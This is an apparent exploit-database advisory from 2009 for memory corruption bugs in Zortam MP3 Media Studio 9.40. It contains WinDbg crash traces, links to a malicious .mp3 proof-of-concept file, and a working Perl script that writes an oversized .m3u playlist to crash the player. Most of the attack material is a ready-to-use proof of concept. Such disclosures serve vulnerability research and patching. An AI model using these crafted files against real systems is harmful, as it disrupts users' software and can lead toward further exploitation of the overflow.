99 lines
No EOL
3.8 KiB
Python
Executable file
99 lines
No EOL
3.8 KiB
Python
Executable file
#!/usr/bin/perl
|
|
#
|
|
#
|
|
# Title: Zortam MP3 Media Studio 9.40 Multiple Memory Corruption Vulnerabilities
|
|
#
|
|
# Product web page: http://www.zortam.com
|
|
#
|
|
# Desc: Zortam MP3 Studio version 9.40 suffers from a memory corruption attack from
|
|
# two different malicious files. The first method is thru a .mp3 file which
|
|
# has its ID3 tags filled with long strings. The second method is a .m3u list
|
|
# which is loaded in to the player resulting in memory corruption of the whole
|
|
# application including Dr.Watson crashing along with the app. For 1st method,
|
|
# you can click the Search Media for MP3's button and select the folder where
|
|
# the .mp3 file with the long ID3 tags is located..boom! The 2nd method, load
|
|
# .m3u file into the MP3 Player..boom boom!
|
|
#
|
|
# Tested on: Microsoft Windows XP Professional SP3 (English)
|
|
#
|
|
#
|
|
# WinDbg:
|
|
#
|
|
# [*] overly long id3 tags (.mp3 file):
|
|
# ---------------------------------------------------------------------------
|
|
#
|
|
# (edc.f34): Access violation - code c0000005 (first chance)
|
|
# First chance exceptions are reported before any exception handling.
|
|
# This exception may be expected and handled.
|
|
# eax=00014d6a ebx=00014d6b ecx=000052c8 edx=00029ad4 esi=03a64ffd edi=03aa3864
|
|
# eip=005788fe esp=0012cc9c ebp=00029ad4 iopl=0 nv up ei pl nz na po nc
|
|
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050202
|
|
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for [path]\zmmspro.exe -
|
|
# zmmspro!ID3_FrameInfo::FieldFlags+0xdce:
|
|
# 005788fe f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
|
|
#
|
|
# ---------------------------------------------------------------------------
|
|
#
|
|
#
|
|
# [*] long playlist (.m3u file):
|
|
# ---------------------------------------------------------------------------
|
|
#
|
|
# (84.b98): Access violation - code c0000005 (first chance)
|
|
# First chance exceptions are reported before any exception handling.
|
|
# This exception may be expected and handled.
|
|
# eax=00000000 ebx=00000111 ecx=00000000 edx=00000000 esi=0012ed5c edi=01e33f54
|
|
# eip=005b7ad9 esp=0012ed18 ebp=0012ed2c iopl=0 nv up ei pl nz na pe nc
|
|
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050206
|
|
# zmmspro!ID3_FrameInfo::FieldFlags+0x3ffa9:
|
|
# 005b7ad9 8b01 mov eax,dword ptr [ecx] ds:0023:00000000=????????
|
|
# 0:000> g
|
|
# (84.b98): Access violation - code c0000005 (!!! second chance !!!)
|
|
# eax=00000000 ebx=00000111 ecx=00000000 edx=00000000 esi=0012ed5c edi=01e33f54
|
|
# eip=005b7ad9 esp=0012ed18 ebp=0012ed2c iopl=0 nv up ei pl nz na pe nc
|
|
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00040206
|
|
# zmmspro!ID3_FrameInfo::FieldFlags+0x3ffa9:
|
|
# 005b7ad9 8b01 mov eax,dword ptr [ecx] ds:0023:00000000=????????
|
|
#
|
|
# ---------------------------------------------------------------------------
|
|
#
|
|
#
|
|
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
#
|
|
# liquidworm gmail com
|
|
#
|
|
# Zero Science Lab - http://www.zeroscience.org
|
|
#
|
|
# 16.07.2009
|
|
#
|
|
#
|
|
|
|
|
|
|
|
# For first method, use folowing PoC file: #
|
|
# #
|
|
################################################################
|
|
# #
|
|
# - 1. http://zeroscience.org/codes/aimp2_evil.mp3 #
|
|
# #
|
|
# - 2. https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/8837.mp3 (2009-aimp2_evil.mp3) (mirror) #
|
|
# #
|
|
# - 3. http://securityreason.com/download/11/13 (mirror) #
|
|
# #
|
|
################################################################
|
|
# #
|
|
# #
|
|
|
|
|
|
# For second method, use folowing PoC code:
|
|
#
|
|
|
|
$fle = "Kung_PoW.m3u";
|
|
$mna = "A" x 800000;
|
|
print "\n\n[+] Creating playlist file: $fle ...\r\n";
|
|
sleep 1;
|
|
open(m3u, ">./$fle") || die "\n\aCannot open $fle: $!";
|
|
print m3u "$mna";
|
|
close (m3u);
|
|
print "\n[+] Playlist file successfully created!\r\n";
|
|
|
|
# milw0rm.com [2009-07-16] |